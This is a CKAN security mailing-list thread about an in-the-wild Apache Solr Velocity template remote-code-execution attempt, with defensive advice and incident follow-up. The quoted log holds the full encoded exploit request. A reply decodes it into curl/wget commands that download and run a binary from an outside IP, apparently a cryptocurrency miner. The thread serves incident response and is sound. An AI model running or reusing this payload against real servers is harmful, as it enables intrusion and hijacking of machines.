[CKAN-Security] Vulnerability in the WIld

Tyler Kennedy tk at tkte.ch
Thu Nov 7 11:24:37 UTC 2019


Ah...right, that would make sense.

I don't believe velocity templates are ever enabled by default, but we
should probably double check. If any of our recommended versions do we
should post a notice (blog, twitter?).

I reached out to ARNES and they've taken down the particular servers
involved in this one, which is the IP the bitcoin miner is being served
from as well as the pool address it's connecting to.

On Thu, Nov 7, 2019 at 5:49 AM Adrià Mercader <adria.mercader at okfn.org>
wrote:

> @Tyler Kennedy <tk at tkte.ch>
> I'm not sure the OP gets your messages if you don't include them in the
> response
> Good to know it's not harmful
>
>
>
>
> On Wed, 6 Nov 2019 at 20:00, Tyler Kennedy <tk at tkte.ch> wrote:
>
>> This is what it tries to run (duplicate lines are not a mistake, this is
>> a script kiddie trying to piece something together so it is messy):
>>
>> ```
>> /usr/bin/curl -o /root/rter http://194.249.0.167/sites/default/files/sync
>> chmod +x /root/rter
>> chmod 777 /root/rter
>> /root/rter
>> /root/rter 2>&1
>> /usr/bin/curl -o /tmp/erta http://194.249.0.167/sites/default/files/sync
>> chmod +x /tmp/erta
>> chmod 777 /tmp/erta
>> /tmp/erta
>> /tmp/erta
>> /usr/bin/wget  -O /home/so*/fert
>> http://194.249.0.167/sites/default/files/sync
>> chmod 777 /home/so*/fert
>> /home/so*/fert
>> /home/so*/fert
>> /usr/bin/curl -o /var/tmp/etfet
>> http://194.249.0.167/sites/default/files/sync
>> chmod 777 /var/tmp/etfet
>> /var/tmp/etfet
>> /usr/bin/wgetak -O /var/tmp/rtsfv
>> http://194.249.0.167/sites/default/files/sync
>> chmod 777 /var/tmp/rtsfv
>> /var/tmp/rtsfv
>> /var/tmp/rtsfv
>> /usr/bin/curl -o /dev/shm/reuer
>> http://194.249.0.167/sites/default/files/sync
>> chmod 777 /dev/shm/reuer
>> /dev/shm/reuer
>> /usr/bin/wget -O /dev/shm/reuer
>> http://194.249.0.167/sites/default/files/sync
>> chmod 777 /dev/shm/reuer
>> ```
>>
>> On Wed, Nov 6, 2019 at 1:51 PM Tyler Kennedy <tk at tkte.ch> wrote:
>>
>>> Hello.
>>>
>>> This is not a CKAN exploit, but an exploit in Solr allowing remote code
>>> execution. It is copied from
>>> https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
>>> Are you sure this actually affected you? You will see garbage in the
>>> logs that did nothing all the time as bots try to find exploits. Make sure
>>> VelocityResponseWriter is disabled (should be by default) and this exploit
>>> will do nothing.
>>>
>>> Thank you,
>>> Tyler Kennedy
>>>
>>> On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:
>>>
>>>> Ckan 2.8.x
>>>> Solr 6.6.x
>>>> Solr Logs:
>>>>  webapp=/solr path=/select
>>>> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,ICAvdXNyL2Jpbi9jdXJsIC1vIC9yb290L3J0ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3Jvb3QvcnRlciA7IGNobW9kIDc3NyAvcm9vdC9ydGVyIDsgL3Jvb3QvcnRlciA7ICAvcm9vdC9ydGVyIDI+JjEgOyAgL3Vzci9iaW4vY3VybCAtbyAvdG1wL2VydGEgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3RtcC9lcnRhIDsgY2htb2QgNzc3IC90bXAvZXJ0YSA7IC90bXAvZXJ0YSA7ICAvdG1wL2VydGEgOyAvdXNyL2Jpbi93Z2V0ICAtTyAvaG9tZS9zbyovZmVydCAgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvaG9tZS9zbyovZmVydCAgIDsgL2hvbWUvc28qL2ZlcnQgOyAvaG9tZS9zbyovZmVydCAgOyAvdXNyL2Jpbi9jdXJsIC1vIC92YXIvdG1wL2V0ZmV0IGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyAgOyAgY2htb2QgNzc3IC92YXIvdG1wL2V0ZmV0IDsgL3Zhci90bXAvZXRmZXQgOyAvdXNyL2Jpbi93Z2V0YWsgLU8gL3Zhci90bXAvcnRzZnYgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvdmFyL3RtcC9ydHNmdiAgOyAvdmFyL3RtcC9ydHNmdiA7IC92YXIvdG1wL3J0c2Z2IDsgIC91c3IvYmluL2N1cmwgLW8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jICA7ICBjaG1vZCA3NzcgL2Rldi9zaG0vcmV1ZXIgIDsvZGV2L3NobS9yZXVlciAgOyAgIC91c3IvYmluL3dnZXQgLU8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgNzc3IC9kZXYvc2htL3JldWVyICA7IC9kZXYvc2htL3JldWVyIA%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
>>>> hits=0 status=0 QTime=0
>>>>
>>>> any version unaffected?
>>>> how could we fix it?
>>>>
>>>> --
>>>> You received this message because you are subscribed to the Google
>>>> Groups "CKAN Security" group.
>>>> To unsubscribe from this group and stop receiving emails from it, send
>>>> an email to security+unsubscribe at ckan.org.
>>>> _______________________________________________
>>>> CKAN security
>>>> https://lists.okfn.org/mailman/listinfo/security
>>>> https://lists.okfn.org/mailman/options/security/tk%40tkte.ch
>>>>
>>>> Repo: https://github.com/ckan/ckan-security
>>>
>>> _______________________________________________
>> CKAN security
>> https://lists.okfn.org/mailman/listinfo/security
>> https://lists.okfn.org/mailman/options/security/adria.mercader%40okfn.org
>>
>> Repo: https://github.com/ckan/ckan-security
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20191107/19699534/attachment-0001.html>


More information about the Security mailing list